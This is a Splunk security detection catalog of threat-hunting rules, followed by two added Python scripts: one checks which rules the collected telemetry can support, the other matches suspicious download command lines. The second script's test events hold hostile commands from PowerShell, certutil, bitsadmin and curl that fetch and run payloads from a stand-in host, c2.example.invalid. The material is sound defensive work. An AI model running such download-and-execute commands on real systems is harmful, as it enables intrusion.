| Name | Data Source | Technique | Type | Analytic Story | Last Updated |
|---|---|---|---|---|---|
| Splunk Protocol Impersonation Weak Encryption Configuration | Splunk | Protocol or Service Impersonation | Hunting | Splunk Vulnerabilities | 2024-10-17 |
| Detect web traffic to dynamic domain providers | | Web Protocols | TTP | Dynamic DNS | 2024-10-17 |
| DNS Query Requests Resolved by Unauthorized DNS Servers | | DNS | TTP | Command And Control, DNS Hijacking, Host Redirection, Suspicious DNS Traffic | 2024-10-17 |
| DNS record changed | | DNS | TTP | DNS Hijacking | 2024-10-17 |
| Any Powershell DownloadFile | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP | Braodo Stealer, DarkCrystal RAT, Data Destruction, Hermetic Wiper, Ingress Tool Transfer, Log4Shell CVE-2021-44228, Malicious PowerShell, PXA Stealer, Phemedrone Stealer | 2024-09-30 |
| Any Powershell DownloadString | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP | Data Destruction, HAFNIUM Group, Hermetic Wiper, IcedID, Ingress Tool Transfer, Malicious PowerShell, Phemedrone Stealer, SysAid On-Prem Software CVE-2023-47246 Vulnerability, Winter Vivern | 2024-09-30 |
| BITSAdmin Download File | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | BITS Jobs, Ingress Tool Transfer | TTP | BITS Jobs, DarkSide Ransomware, Flax Typhoon, Gozi Malware, Ingress Tool Transfer, Living Off The Land | 2024-09-30 |
| CertUtil Download With URLCache and Split Arguments | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | CISA AA22-277A, Compromised Windows Host, DarkSide Ransomware, Flax Typhoon, Forest Blizzard, Ingress Tool Transfer, Living Off The Land, ProxyNotShell | 2024-11-28 |
| CertUtil Download With VerifyCtl and Split Arguments | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Compromised Windows Host, DarkSide Ransomware, Ingress Tool Transfer, Living Off The Land | 2024-11-28 |
| Curl Download and Bash Execution | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Compromised Windows Host, Ingress Tool Transfer, Linux Living Off The Land, Log4Shell CVE-2021-44228 | 2024-11-28 |
| Detect Certify Command Line Arguments | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Steal or Forge Authentication Certificates, Ingress Tool Transfer | TTP | Compromised Windows Host, Ingress Tool Transfer, Windows Certificate Services | 2024-11-28 |
| Detect Remote Access Software Usage File | Sysmon EventID 11 | Remote Access Software | Anomaly | CISA AA24-241A, Command And Control, Gozi Malware, Insider Threat, Ransomware | 2024-09-30 |
| Detect Remote Access Software Usage FileInfo | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Remote Access Software | Anomaly | Command And Control, Gozi Malware, Insider Threat, Ransomware | 2024-09-30 |
| Detect Remote Access Software Usage Process | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Remote Access Software | Anomaly | CISA AA24-241A, Command And Control, Gozi Malware, Insider Threat, Ransomware | 2024-09-30 |
| Download Files Using Telegram | Sysmon EventID 15 | Ingress Tool Transfer | TTP | Phemedrone Stealer, Snake Keylogger, XMRig | 2024-09-30 |
| Linux Curl Upload File | Sysmon for Linux EventID 1 | Ingress Tool Transfer | TTP | Data Exfiltration, Ingress Tool Transfer, Linux Living Off The Land | 2024-09-30 |
| Linux Ingress Tool Transfer Hunting | Sysmon for Linux EventID 1 | Ingress Tool Transfer | Hunting | Ingress Tool Transfer, Linux Living Off The Land | 2024-10-17 |
| Linux Ingress Tool Transfer with Curl | Sysmon for Linux EventID 1 | Ingress Tool Transfer | Anomaly | Ingress Tool Transfer, Linux Living Off The Land | 2024-09-30 |
| Linux Ngrok Reverse Proxy Usage | Sysmon for Linux EventID 1 | Protocol Tunneling, Proxy, Web Service | Anomaly | Reverse Network Proxy | 2024-09-30 |
| Linux Proxy Socks Curl | Sysmon for Linux EventID 1 | Proxy, Non-Application Layer Protocol | TTP | Ingress Tool Transfer, Linux Living Off The Land | 2024-09-30 |
| Living Off The Land Detection | | Ingress Tool Transfer, Exploit Public-Facing Application, Command and Scripting Interpreter, External Remote Services | Correlation | Living Off The Land | 2024-09-30 |
| Log4Shell CVE-2021-44228 Exploitation | | Ingress Tool Transfer, Exploit Public-Facing Application, Command and Scripting Interpreter, External Remote Services | Correlation | CISA AA22-320A, Log4Shell CVE-2021-44228 | 2024-09-30 |
| LOLBAS With Network Traffic | Sysmon EventID 3 | Ingress Tool Transfer, Exfiltration Over Web Service, System Binary Proxy Execution | TTP | Living Off The Land | 2024-09-30 |
| PowerShell Script Block With URL Chain | Powershell Script Block Logging 4104 | PowerShell, Ingress Tool Transfer | TTP | Malicious PowerShell | 2024-09-30 |
| PowerShell WebRequest Using Memory Stream | Powershell Script Block Logging 4104 | PowerShell, Ingress Tool Transfer, Fileless Storage | TTP | Malicious PowerShell, MoonPeak | 2024-09-30 |
| Suspicious Curl Network Connection | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Ingress Tool Transfer, Linux Living Off The Land, Silver Sparrow | 2024-10-17 |
| Wget Download and Bash Execution | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Compromised Windows Host, Ingress Tool Transfer, Log4Shell CVE-2021-44228 | 2024-12-03 |
| Windows Abused Web Services | Sysmon EventID 22 | Web Service | TTP | CISA AA24-241A, NjRAT | 2024-09-30 |
| Windows App Layer Protocol Qakbot NamedPipe | Sysmon EventID 17, Sysmon EventID 18 | Application Layer Protocol | Anomaly | Qakbot | 2024-09-30 |
| Windows App Layer Protocol Wermgr Connect To NamedPipe | Sysmon EventID 17, Sysmon EventID 18 | Application Layer Protocol | Anomaly | Qakbot | 2024-09-30 |
| Windows Application Layer Protocol RMS Radmin Tool Namedpipe | Sysmon EventID 17, Sysmon EventID 18 | Application Layer Protocol | TTP | Azorult | 2024-09-30 |
| Windows Curl Download to Suspicious Path | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Compromised Windows Host, Forest Blizzard, IcedID, Ingress Tool Transfer | 2024-11-28 |
| Windows Curl Upload to Remote Destination | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Compromised Windows Host, Ingress Tool Transfer | 2024-11-28 |
| Windows File Transfer Protocol In Non-Common Process Path | Sysmon EventID 3 | Mail Protocols, Application Layer Protocol | Anomaly | AgentTesla, Snake Keylogger | 2024-09-30 |
| Windows Ingress Tool Transfer Using Explorer | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | Anomaly | DarkCrystal RAT | 2024-09-30 |
| Windows Ldifde Directory Object Behavior | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer, Domain Groups | TTP | Volt Typhoon | 2024-09-30 |
| Windows Mail Protocol In Non-Common Process Path | Sysmon EventID 3 | Mail Protocols, Application Layer Protocol | Anomaly | AgentTesla | 2024-09-30 |
| Windows Multi hop Proxy TOR Website Query | Sysmon EventID 22 | Mail Protocols, Application Layer Protocol | Anomaly | AgentTesla | 2024-09-30 |
| Windows Ngrok Reverse Proxy Usage | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Protocol Tunneling, Proxy, Web Service | Anomaly | CISA AA22-320A, CISA AA24-241A, Reverse Network Proxy | 2024-09-30 |
| Windows Protocol Tunneling with Plink | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Protocol Tunneling, SSH | TTP | CISA AA22-257A | 2024-09-30 |
| Windows Proxy Via Netsh | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Internal Proxy, Proxy | Anomaly | Volt Typhoon | 2024-09-30 |
| Windows Proxy Via Registry | Sysmon EventID 12, Sysmon EventID 13 | Internal Proxy, Proxy | Anomaly | Volt Typhoon | 2024-09-30 |
| Windows Remote Access Software BRC4 Loaded Dll | Sysmon EventID 7 | Remote Access Software, OS Credential Dumping | Anomaly | Brute Ratel C4 | 2024-09-30 |
| Windows Remote Access Software Hunt | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Remote Access Software | Hunting | Command And Control, Insider Threat, Ransomware | 2024-10-17 |
| Windows Remote Access Software RMS Registry | Sysmon EventID 12, Sysmon EventID 13 | Remote Access Software | TTP | Azorult | 2024-09-30 |
| Windows SQL Spawning CertUtil | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Flax Typhoon | 2024-10-17 |
| WinRAR Spawning Shell Application | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Ingress Tool Transfer | TTP | Compromised Windows Host, WinRAR Spoofing Attack CVE-2023-38831 | 2024-11-28 |
| Detect DGA domains using pretrained model in DSDL | | Domain Generation Algorithms | Anomaly | Command And Control, DNS Hijacking, Data Exfiltration, Dynamic DNS, Suspicious DNS Traffic | 2024-10-17 |
| Detect Large Outbound ICMP Packets | Palo Alto Network Traffic | Non-Application Layer Protocol | TTP | Command And Control | 2024-11-06 |
| Detect Outbound SMB Traffic | | File Transfer Protocols, Application Layer Protocol | TTP | DHS Report TA18-074A, Hidden Cobra Malware, NOBELIUM Group | 2024-10-16 |
| Detect Remote Access Software Usage DNS | Sysmon EventID 22 | Remote Access Software | Anomaly | CISA AA24-241A, Command And Control, Insider Threat, Ransomware | 2024-09-30 |
| Detect Remote Access Software Usage Traffic | Palo Alto Network Traffic | Remote Access Software | Anomaly | Command And Control, Insider Threat, Ransomware | 2024-09-30 |
| Detect suspicious DNS TXT records using pretrained model in DSDL | | Domain Generation Algorithms | Anomaly | Command And Control, DNS Hijacking, Suspicious DNS Traffic | 2024-10-17 |
| DNS Query Length Outliers - MLTK | | DNS, Application Layer Protocol | Anomaly | Command And Control, Hidden Cobra Malware, Suspicious DNS Traffic | 2024-10-17 |
| Excessive DNS Failures | | DNS, Application Layer Protocol | Anomaly | Command And Control, Suspicious DNS Traffic | 2024-10-17 |
| Ngrok Reverse Proxy on Network | Sysmon EventID 22 | Protocol Tunneling, Proxy, Web Service | Anomaly | CISA AA22-320A, CISA AA24-241A, Reverse Network Proxy | 2024-09-30 |
| SSL Certificates with Punycode | | Encrypted Channel | Hunting | OpenSSL CVE-2022-3602 | 2024-10-17 |
| TOR Traffic | Palo Alto Network Traffic | Proxy, Multi-hop Proxy | TTP | Command And Control, NOBELIUM Group, Prohibited Traffic Allowed or Protocol Mismatch, Ransomware | 2024-09-30 |
| Zeek x509 Certificate with Punycode | | Encrypted Channel | Hunting | OpenSSL CVE-2022-3602 | 2024-10-17 |
| Detect Remote Access Software Usage URL | Palo Alto Network Threat | Remote Access Software | Anomaly | CISA AA24-241A, Command And Control, Insider Threat, Ransomware | 2024-09-30 |
| Juniper Networks Remote Code Execution Exploit Detection | Suricata | Exploit Public-Facing Application, Ingress Tool Transfer, Command and Scripting Interpreter | TTP | Juniper JunOS Remote Code Execution | 2024-09-30 |
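The practical question a detection engineer asks of a catalog like this is "which of these can I turn on with the telemetry I already collect, and which techniques are left uncovered?" The script below is an added example, not Splunk's own tooling: it parses the pipe-delimited table, treats the Data Source cell as a list of alternative feeds (any one of them is enough, since "CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688" are three sources of the same process-creation event), and reports ready, blocked and unmapped detections plus the technique gaps. CATALOG holds eight rows transcribed from the table; AVAILABLE is an assumed inventory of collected sources.

```python
"""Triage a Splunk Security Content detection table against collected telemetry.

Added example, not Splunk's code. CATALOG is eight rows transcribed from the
table above; paste the whole table in its place to run the triage for real.
AVAILABLE is an assumed inventory of data sources you actually ingest.
"""
from collections import Counter

CATALOG = """\
| Name | Data Source | Technique | Type | Analytic Story | Last Updated |
|---|---|---|---|---|---|
| BITSAdmin Download File | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | BITS Jobs, Ingress Tool Transfer | TTP | BITS Jobs, DarkSide Ransomware, Flax Typhoon, Gozi Malware, Ingress Tool Transfer, Living Off The Land | 2024-09-30 |
| Detect Remote Access Software Usage File | Sysmon EventID 11 | Remote Access Software | Anomaly | CISA AA24-241A, Command And Control, Gozi Malware, Insider Threat, Ransomware | 2024-09-30 |
| Linux Ngrok Reverse Proxy Usage | Sysmon for Linux EventID 1 | Protocol Tunneling, Proxy, Web Service | Anomaly | Reverse Network Proxy | 2024-09-30 |
| Windows Proxy Via Registry | Sysmon EventID 12, Sysmon EventID 13 | Internal Proxy, Proxy | Anomaly | Volt Typhoon | 2024-09-30 |
| Windows Protocol Tunneling with Plink | CrowdStrike ProcessRollup2, Sysmon EventID 1, Windows Event Log Security 4688 | Protocol Tunneling, SSH | TTP | CISA AA22-257A | 2024-09-30 |
| Detect Large Outbound ICMP Packets | Palo Alto Network Traffic | Non-Application Layer Protocol | TTP | Command And Control | 2024-11-06 |
| Excessive DNS Failures | | DNS, Application Layer Protocol | Anomaly | Command And Control, Suspicious DNS Traffic | 2024-10-17 |
| Juniper Networks Remote Code Execution Exploit Detection | Suricata | Exploit Public-Facing Application, Ingress Tool Transfer, Command and Scripting Interpreter | TTP | Juniper JunOS Remote Code Execution | 2024-09-30 |
"""

# Assumed inventory: process creation via Sysmon, Sysmon file events, PAN traffic logs.
AVAILABLE = {"Sysmon EventID 1", "Sysmon EventID 11", "Palo Alto Network Traffic"}


def _split(cell):
    return [x.strip() for x in cell.split(",") if x.strip()]


def parse_catalog(text):
    """Turn the pipe table into a list of dicts; skips header and separator rows."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|") or set(line) <= set("|- "):
            continue                      # blank line or the |---| separator
        cells = [c.strip() for c in line.strip("|").split("|")]
        if cells[0] == "Name" or len(cells) != 6:
            continue                      # header row or a malformed line
        name, sources, techniques, kind, stories, updated = cells
        rows.append({"name": name, "sources": _split(sources),
                     "techniques": _split(techniques), "type": kind,
                     "stories": _split(stories), "updated": updated})
    return rows


def triage(rows, available):
    """ready: at least one listed source is collected; blocked: none is;
    unmapped: the catalog lists no source (e.g. data-model-only searches)."""
    ready, blocked, unmapped = [], [], []
    for r in rows:
        if not r["sources"]:
            unmapped.append(r)
        elif any(s in available for s in r["sources"]):
            ready.append(r)
        else:
            blocked.append(r)
    return ready, blocked, unmapped


def technique_gaps(rows, ready):
    """Techniques named anywhere in the catalog that no ready detection covers."""
    covered = {t for r in ready for t in r["techniques"]}
    return sorted({t for r in rows for t in r["techniques"]} - covered)


def source_value(blocked):
    """How many blocked detections each missing source would unlock on its own."""
    return Counter(s for r in blocked for s in r["sources"])


def summarize(text, available):
    rows = parse_catalog(text)
    ready, blocked, unmapped = triage(rows, available)
    return {"ready": sorted(r["name"] for r in ready),
            "blocked": sorted(r["name"] for r in blocked),
            "unmapped": sorted(r["name"] for r in unmapped),
            "technique_gaps": technique_gaps(rows, ready),
            "unlocks": source_value(blocked)}


if __name__ == "__main__":
    for key, value in summarize(CATALOG, AVAILABLE).items():
        print(f"{key}: {value}")
```

With the assumed inventory, four of the eight sample rows are ready, three are blocked (one each on Sysmon for Linux, Sysmon registry events and Suricata), and "Excessive DNS Failures" is unmapped because its Data Source cell is empty; the gap list is what you would take to the data-onboarding conversation. Unmapped rows are worth a manual look rather than being dropped: a blank source cell in this catalog usually means the search reads a data model rather than a raw sourcetype.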
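Several of the endpoint rows above (Any Powershell DownloadFile, Any Powershell DownloadString, BITSAdmin Download File, the two CertUtil rows and Windows Curl Download to Suspicious Path) share one shape: a trusted Windows binary whose command line reveals a download. The block below is an added example of that matching logic run over constructed Sysmon EventID 1 style records; it is not Splunk's SPL. The predicates are approximations inferred from the detection names, SUSPICIOUS_DIRS is an assumed drop-directory list, and every command line and host name is made up.

```python
"""Illustrative command-line matching for the ingress-tool-transfer rows above.

Added example, not Splunk's SPL. Predicates approximate what the detection
names describe; SUSPICIOUS_DIRS and all sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """The fields these rules need from a Sysmon EventID 1 / Security 4688 record."""
    image: str
    command_line: str
    parent_image: str = ""


# Assumed drop directories for the "Suspicious Path" qualifier.
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\windows\\temp\\",
                   "\\appdata\\local\\temp\\", "\\programdata\\")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_switches(cmd, *names):
    # certutil and bitsadmin accept both '-' and '/' as the switch prefix.
    return all(re.search(rf"(?<!\S)[-/]{n}\b", cmd, re.I) for n in names)


def _writes_to_suspicious_path(cmd):
    low = cmd.lower()
    return any(d in low for d in SUSPICIOUS_DIRS)


# (catalog detection name, image basenames, predicate on the command line)
RULES = [
    ("Any Powershell DownloadFile", {"powershell.exe", "pwsh.exe"},
     lambda c: re.search(r"\.downloadfile\s*\(", c, re.I) is not None),
    ("Any Powershell DownloadString", {"powershell.exe", "pwsh.exe"},
     lambda c: re.search(r"\.downloadstring\s*\(", c, re.I) is not None),
    ("BITSAdmin Download File", {"bitsadmin.exe"},
     lambda c: _has_switches(c, "transfer")
     and re.search(r"https?://", c, re.I) is not None),
    ("CertUtil Download With URLCache and Split Arguments", {"certutil.exe"},
     lambda c: _has_switches(c, "urlcache", "split")),
    ("CertUtil Download With VerifyCtl and Split Arguments", {"certutil.exe"},
     lambda c: _has_switches(c, "verifyctl", "split")),
    ("Windows Curl Download to Suspicious Path", {"curl.exe"},
     lambda c: re.search(r"(?<!\S)(-o|--output)\s", c) is not None
     and _writes_to_suspicious_path(c)),
]


def detect(event):
    """Return the catalog detection names this process event would trigger."""
    image = _basename(event.image)
    return [name for name, images, pred in RULES
            if image in images and pred(event.command_line)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S32 = r"C:\Windows\System32"

# Constructed events: six downloads followed by three benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(PS, r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://c2.example.invalid/a.exe','C:\Users\Public\a.exe')"),
    ProcEvent(PS, r"powershell.exe -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1'))"),
    ProcEvent(S32 + r"\bitsadmin.exe", r"bitsadmin.exe /transfer job1 /download /priority high http://c2.example.invalid/x.exe C:\Users\Public\x.exe"),
    ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -urlcache -split -f http://c2.example.invalid/t.exe C:\Windows\Temp\t.exe"),
    ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -verifyctl -split -f http://c2.example.invalid/t.exe"),
    ProcEvent(S32 + r"\curl.exe", r"curl.exe -o C:\Users\Public\p.exe http://c2.example.invalid/p.exe"),
    ProcEvent(S32 + r"\certutil.exe", r"certutil.exe -hashfile C:\Users\Public\p.exe SHA256"),
    ProcEvent(S32 + r"\curl.exe", r"curl.exe -o C:\Program Files\Vendor\update.bin https://updates.vendor.invalid/update.bin"),
    ProcEvent(PS, r"powershell.exe -c Get-Process"),
]


def run_sample():
    """Alerts per sample event, in SAMPLE_EVENTS order."""
    return [detect(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, alerts in zip(SAMPLE_EVENTS, run_sample()):
        print(f"{alerts or '-'}  <=  {event.command_line[:70]}")
```

Two caveats a practitioner should carry over from this toy: the real catalog searches run over the normalized Endpoint.Processes data model rather than raw command lines, and case-insensitive regexes like these are easy to sidestep (a renamed binary, `curl -O` into the current directory, or a PowerShell download expressed through `Invoke-WebRequest` or a memory stream, which is why the table also carries the script-block-logging rows PowerShell Script Block With URL Chain and PowerShell WebRequest Using Memory Stream).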